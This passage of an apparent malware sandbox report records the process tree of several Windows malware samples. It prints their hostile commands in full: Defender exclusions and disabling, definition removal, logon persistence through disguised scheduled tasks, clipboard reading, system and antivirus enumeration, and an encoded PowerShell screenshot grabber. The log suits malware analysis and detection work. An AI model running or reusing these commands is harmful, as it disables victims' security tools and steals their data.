QBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        7⤵
        
        PID:2012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfnhvnmm\xfnhvnmm.cmdline"
        8⤵
        
        PID:7884
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF90.tmp" "c:\Users\Admin\AppData\Local\Temp\xfnhvnmm\CSC6045FC2054E14F20877286965D79579.TMP"
        9⤵
        
        PID:5452
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:7984
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6828
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:7816
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:7160
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Views/modifies file attributes
        
        PID:2312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        6⤵
        
        PID:4548
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        7⤵
        Views/modifies file attributes
        
        PID:4700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6788
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:7084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6896
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:4988
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:7752
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:6912
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:772
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6868
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        6⤵
        
        PID:2256
        
        C:\Windows\system32\getmac.exe
        
        getmac
        7⤵
        
        PID:4988
  - - C:\Users\Admin\Desktop\Files\built.exe
      "C:\Users\Admin\Desktop\Files\built.exe"
      4⤵
      PID:7712
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5588,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5456 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:2648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5592,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3472 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1480,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5460 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:2592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5444,i,1346134653164321029,13997925731720069621,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5496 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1916
- - C:\Users\Admin\Desktop\4363463463464363463463463.exe
    "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
    3⤵
    PID:4224
  - - C:\Users\Admin\Desktop\Files\msf.exe
      "C:\Users\Admin\Desktop\Files\msf.exe"
      4⤵
      PID:3348
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1220
        5⤵
        Program crash
        
        PID:5236
  - - C:\Users\Admin\Desktop\Files\Fixer.exe
      "C:\Users\Admin\Desktop\Files\Fixer.exe"
      4⤵
      PID:5368
  - - C:\Users\Admin\Desktop\Files\plantrojan.exe
      "C:\Users\Admin\Desktop\Files\plantrojan.exe"
      4⤵
      PID:6940
  - - C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
      "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
      4⤵
      PID:6336
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aKpddkokjhqh.bat" "
        5⤵
        
        PID:5260
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:6560
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4908
      - C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        6⤵
        
        PID:6704
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TyK1dqdtWKxa.bat" "
        7⤵
        
        PID:5704
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4564
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1768
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        8⤵
        
        PID:7424
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S2FswMXWfSBm.bat" "
        9⤵
        
        PID:7236
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:700
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6648
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        10⤵
        
        PID:6832
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1288
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\z1W09SQFMw5j.bat" "
        11⤵
        
        PID:5292
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:3108
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2200
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        12⤵
        
        PID:7504
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sBMJR3OIGwkV.bat" "
        13⤵
        
        PID:7252
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:7028
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7740
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        14⤵
        
        PID:6484
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sIWkoTXopEVt.bat" "
        15⤵
        
        PID:5172
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:8336
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:9020
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        16⤵
        
        PID:8272
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pMKmqoYBScQZ.bat" "
        17⤵
        
        PID:8356
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:7384
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4688
        
        C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe
        
        "C:\Users\Admin\Desktop\Files\sharpmonoinjector.exe"
        18⤵
        
        PID:9704
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gkzbTDs64Puu.bat" "
        19⤵
        
        PID:9196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:4080
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:8212
  - - C:\Users\Admin\Desktop\Files\anne.exe
      "C:\Users\Admin\Desktop\Files\anne.exe"
      4⤵
      PID:1488
  - - C:\Users\Admin\Desktop\Files\yo.exe
      "C:\Users\Admin\Desktop\Files\yo.exe"
      4⤵
      PID:852
    - - C:\Users\Admin\Desktop\Files\yo.exe
        
        "C:\Users\Admin\Desktop\Files\yo.exe"
        5⤵
        
        PID:5240
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\yo.exe'"
        6⤵
        
        PID:5188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\yo.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4448
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:5152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:784
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:7140
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:1824
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:6004
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:5712
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:4036
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:6596
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:6072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        
        PID:6000
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:5672
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:7048
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:5224
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:6460
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:3056
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:6308
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:6608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAA